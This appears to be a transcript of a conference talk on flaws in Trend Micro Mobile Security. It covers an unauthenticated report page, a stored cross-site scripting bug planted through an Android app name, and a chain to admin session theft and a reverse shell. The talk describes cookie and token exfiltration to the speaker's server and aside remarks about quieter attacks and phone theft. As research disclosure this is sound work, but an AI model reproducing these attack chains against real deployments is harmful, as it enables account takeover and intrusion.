Who Scans the Scanner? Exploiting Trend Micro Mobile Security

Alright, ladies and gentlemen, please put your hands together for Lucas. He will be our next speaker. Hi guys. First of all, I need to say some things. I am still learning English. I've learned everything from myself, so sorry about the accent. But I think the message will be the most important. And just to clarify the expectations of this talk, we will cover things with the focus of vulnerability research, zero-day fighting, issues that will help you people and things that do some like red teaming or APT or things like that.

feel free to reach me out after this talk and it will be my pleasure to chat with everybody. And the technical aspect of this talk, I will talk about information disclosure that don't have authentication and in this information disclosure page we find one cross-site scripting storage and And with this cross-site, we got one proof of concept that one user could get the key to join any agent to the console of the Trend Micro. And we'll also cover a potential bug that could lead to command execution in the Android client-side. So I think this clarifies some things. And please be patient with my accent and with my English. But yeah, it's this. Here we have some letters. It's me. I think this is not so

important to this talk, so if you guys need to reach me out or something like that, I think you guys can take one picture or something like this. And let's go with the important things. Why trended micro mobile security? To me, this platform was very important because I meet one guy His name is Oliveira Lima, and he comes like a father figure to me. I was in a bad situation of life, and when I met him, he started to teach me in cybersecurity, offensive security in particularity. When I met him, I also saw that one thing that made him proud was the Trend Micro House of Fame. So I started thinking, when one day I have the skills,

I think this will be one thing to make him proud of all these years. Talking about, you know, the aspect of the market security tools must need to be tested too principal because companies have these these tools and if you get some zero days some issue that code get you in you you get some privilege of level that maybe other tools don't have because security tools need to traffic and need to understand various layers of data. So this is something that researchers need to search in zero day and things like that. And we want also a challenge because, you know, one enterprise focused on antivirus, I think the level of this security will be more high. So with

this challenge, we get some data that we could improve and basically don't or result. And yeah, this is the Trend Micro Hall of Fame. And Oliveira Lima was in 2017, I think this is the number. And this was when I met him and talking about the impact of the market. When we see in the Google Play Store, we see this number. So, very users around the world and companies are using the enterprise mobile security that is the APK that we use to connect in the console of the Trend Micro and in the business page we can see also the numbers of companies and segments of this industry that work with Trend Micro. This was the email

of my report. Trend Micro gets some time to reply this and also fix the issue because the issues are in particularity in diversos applications of Trend Micro, including the XDR. I think the name is Vizio One. And this takes some time to get fixed. So after this approach of the email with taking the approaches of the responsible disclosure, I go to tell you guys all the technical aspects of these findings. So how can I get these issues, the approaches? I think in vulnerability research, it's like some artistic way because you have something like the abstract and if you have some approaches and things that you can think and get the puzzle done, you get a really beautiful

result of one art that maybe you can change sometimes four, five, six vulnerabilities and get one Mona Lisa of cybersecurity exploit. And starting with this, before I get the dynamic analysis, I had to front, I have in my front, I was looking and in my front, I've searched and got one SSL pine and one antitumper. I will not focus on explain how this work, but in how I found these brushes because I think on the internet, you guys already can search how bypass SSL pining and anti-tumpering. But the mind behind this, the process behind this, the flow, I think this will not be on the internet. So this is the thing that I want to show you guys. regarding the SSL pinning.

Here is all the package and class that I find and the method that I need to patch to avoid this client-side protection in order to do the dynamic analysis. So this is the code of the anti-tamper. And if you guys can see just to be curious, in the line 592, this is the hash of the APK that In the condition if the APK does not match this hash, this results that the hash, the APK was modified and has a new hash. So the agent will not let the user open the APK. when we edit this, so I basically remove everything and put the return of the constant every time false, true. So when this condition comes, the Boolean true will

return every time saying that the MD5 is right and we get in on the application. So with no problems with the dynamical analysis in hand, I start with my brushes and the brushes is very important because I think everyone says that the RIPCOM part is one of the most important things. And in vulnerability research, it is also true the most important thing because you need to deal with a lot of reverse engineer and things that you can maybe don't have information exposed on the internet. So you need time, you need pay attention, and create some approaches to not get lost because there is big, big, big things like giant line of codes, like maybe expose it, documentation. PDF

teaching how you how the administration's can use the the platform so this take time and with this time when you know how the applications works you can get some insights in how you can change the flow execution or find some things that is not expected from the developers so yeah The key points of this find is this report page are unauthenticated, so everyone that have this name, MDM web repository, have report manual output security scan report, will get in this page. You just need to change the IP address and you will get reports of the All the agents that-- all the metadata of agents are sending to the console. So-- and this is the report page of administration view. You can also

generate the report and also schedule. So in big giant companies, giant enterprises, this report have very very uh good information because the unique problem here is like uh the data that is returned is uh is focused on one top 10 because all the information are returned in charts yeah so we can only get uh some uh clues about the top 10 information data that is coming out of the console. So we have for this all types of report, the security report, devices inventory report, compliance violation report, application inventory report, device enrollment report, and device unenrollment report. The information is here in the print screen, but we don't have some things that are interesting right now.

But moving forward, when I was saying to you guys about the brushes, to me, vulnerability research is one artistic way of seeing hacking. So the process is very important. In one page that maybe don't represent some risk, I think if you go searching and looking deeply, you can maybe find some things that will get your first vulnerability more and more valuable. This is a clue. If the page are already unauthenticated, maybe the developers have forgotten something, forgot to maybe sanitize it, some characters or things like that. And I start to think, how can I get this? How can I... can make this table with data where this data comes out and with this thinking I

get into agent and because of this I was it was needed to bypass the client-side protections because I needed to put the communication proxy to watch the the traffic and maybe modify the metadata of the android and get it it to the console so if everything goes right the console will hinder the things that I am sending and maybe we can get some vulnerability. And in this case, I have done research in so many types of injection in this page, but the JavaScript injection, it was the only one that I got triggered. But this cross-site scripting was one interesting storage cross-site scripting because this page is unauthenticated and in the exploitation part, of the chain, we could get some POC, some proof of

concept that we could get in the console, in the administration console with the privilege of the admin. We also get the enroll key. So like cross-site scripting is based on the hacker operation. I think this is a type of attack that have a majority and various ways to be applied in one operation or in one APT focused on company or one enterprise that is using Trend Micro. Yeah. So the key points here are the Android agent sends metadata, including the app name to the server. So the parameter that was vulnerable is the app name of the server. the request. And one thing that is cool, if you guys create some APK with the name that has the payload, when the

console starts to scan everything, they will get literally this new APK with the name that contains the payload and will trigger again because the app name will be handed in the device inventory report and you don't need to like send a properly one request or something like that. You could like automate this action to get one operation more silently and I think more acuity. and the name is deployed on the report without sanitization or any type of protection. Allows persistent JavaScript injection in a page rendered for admins and users. Storage cross-site scripting is delivered via the same unauthenticated report endpoint. Work across browsers, no special payload needed for execution. Exploitation occurs with without the user interaction, you just need to enter in this

page and the payload will be triggered. And yeah, this cross-site scripting can be used to do various, various types of attacks, different attacks. This was the request and the payload used. Oh, all right. It's good to see. Woohoo! But yeah, we have here the request. We can see here the endpoint that was affected and here the payload that I have used. And in the console part, we got here in the device tab. And when I come to the user ID of my device, here I can see the names of the installed applications that was scanned from my phone. And we also get here the payload that I have used. I, before, after this, I go, I've go to

the application inventory report, generates the new report or in case of one real attack scenario world, I think the most appropriate way will be wait the schedule to run and get the new report with the And here we got the simple alert to just see the JavaScript working. This explanation here, I will show one simple video to show better because I know that I need to improve my conversation. But I think with the video will be more easy. So yeah, here I am changing the app name. But you guys can automatize this with diversals and various ways, like using one APK that you guys have created, maybe using one Friday script embedded in another APK, generating the report. And

when we check it out, we get the simple alert just to... Thank you. Thank you. And one thing just to show is that don't need the authentication. So everyone that access this page will will trigger this cross site scripting. Yeah. Showing that I am really not logged in. Okay. So yeah, we have this entry point so in hakai security we have some mindset that we go always deeply every time we can because we train our mindset we learn everything every time things and We want to get more close of one real attacker. So in our Vulnerability researches in our security researchers. We always focus on this part to get more close of these threats So I was

thinking in one scenario to this talk one classical A way of, you know, to get more cross-site scripting, better version of the cross-site scripting, like a pre-graded version, is the session hijacking. But obviously, based on your redditing operation, your APT or something like that, you can always choose your way because one time that you have the control of the client-side user, you can basically do anything that your mindset and your brain get. So yeah, to show, I have done one JS exploit. I don't know if you guys can see, but I will-- one second. All right. I will pass some faster to you guys. I think now is better to see. But there is not complex. There is not anything hard.

It's doing-- it's doing-- they get the local storage to avoid problems with the CSRF token and our goal is to get the cookies to manipulate and interact with the console. So I have done here the exploit to already log and make a post to my web server with the communication using the object fetch to avoid problems with course also so here we basically have the instantiation of the cookies and the instantiation of the local storage to get the value of ssrf token and all the particularity headers that need to communicate to the console after we get the tokens needed. Yeah. So keep going. This was the-- sorry, guys, just to get a better view to you guys. But this is the

code of the web server, a simple code too. created to avoid problems and get more debuggable verbose information to understand what we are doing. So here we have our configuration, of course, to avoid again problems, or self path with the slash log, sorry for the Portuguese, the slash log. and the content length and the information that we are exfiltration of the user that are accessing this page. So this was the final payload. It's a simple payload. I just need to break the first meta tag of script and after this I have created my script with the source pointing to my IP address with my JS exploit the previous exploit of JS that I was showing to you guys and yeah this was

the result when the administration access the report page and we got on our VPS the cookies like the session info, the deploy mode, the TMMMS token, and this was used to authenticate in the console. And privilege, I was saying that I already created one action that make that will make us with 100% with accuracy that we get the avaliable token and we got access to the administration console. So again, to make things more easy, I think videos work very, very good. So here we have the attack, all the that all the attack of this proof of concept, I am right now just deleting the metadata of every application that was in my cell phone. Here is the affected endpoint and the affected

parameter with the payload that I have constructed. and now I am going to the console to see if everything is okay and yeah we have the payload now we just need to enter in the report page the application inventory report page and you guys already can see Nothing happens in the administration view, but in our console, we got all the information that we could use to get in on the console. So here we have the session info, we have the TMMS token, and below we have the request user to test if this session is available Valid, yeah. And here we got the enroll key. So with a valid session, we just changed the values of the browser's

local storage. And we can refresh the page and get in the dashboard administration page. And moving forward to the command execution part, This vulnerability, this bug vulnerability, unfortunately, is more specifically. So the affected code I found in the Trend Micro Android-based ITU and device ITU. class and package have in the line, the line will be changed, but in the method Boolean C, in the line tree, we have one getRuntimeExec. This particularity of this line they when the application starts the scan they look if the Android agent or iPhone was hooted or jailbreak it and this was one of these verification to know if the device are with high privilege or things like that because the binary sue so it

was a hard verification because you guys will see if someone with you know some acknowledgement about reverse engineering and creating exploiting maybe you will be hacked by a this specifically in just single line of code but is more hard because this is focused on the client side so you need some scenarios that to exploit this but to just to show what is the problem if the attacker, the operator, got success in this scenario, here I am setting up my netcat and I will run Frida with the command execution exploit. The application will open and we will press to scan and here we got the connection of the reverse shell.

Yeah. So if you guys see, the attack vectors here are the memory level execution view, the class, the end package, device, the class device, and the method was C. App side load with the attack vector maybe could be success with app side load, like using one with embedded code. Or maybe if you have some courage, if you are not like me and have some anxiety, you can maybe try to steal from the enterprise in one operation. And with this cell phone in hands, you can verify types of data and access that could help you to do the lateral movement and maybe get more information and a better result of the final operation. Unfortunately, the challenge was I could not get this

execution run by console to understand how this took... How to get one reverse shell, you need also understand the life cycle of the scan because the malicious actions will only happen when the scan goes. So we have some cases here and some technical insights. But unfortunately, Trend Micro has replied me not considering it a vulnerability because this code, to exploit this, we need to create another APK or another type of interaction. And unfortunately, they not approve it. But here we have the affected version. If you guys want to get some, you know, some adventuring. And yeah, in the first, in the beginning of the talk, I was saying Oliveira Lima was like one father to me and one inspiration. And I am so happy

to make him proud to say that Trend Micro confirmed the other two vulnerabilities. And right now I am in the Hall of Fame of Trend Micro. And this photo to me is very cool because it was in the first time here in Vegas. And I am from Brazil, and in Brazil we do not have dispensary. So yeah, I love this cookies in my heart. Yeah. So I was very, very happy. Viva America. And this was the timeline of research. Next month, you guys will have the full article. The article, I promise you guys that I can write perfectly in English, but I learned everything from myself. So I need to practice more conversation, conversation, and

I will get more shy, less shy, and yeah, always improving myself. Questions? Oh, it's time it was over, but yeah. Thank you, guys. Thank you.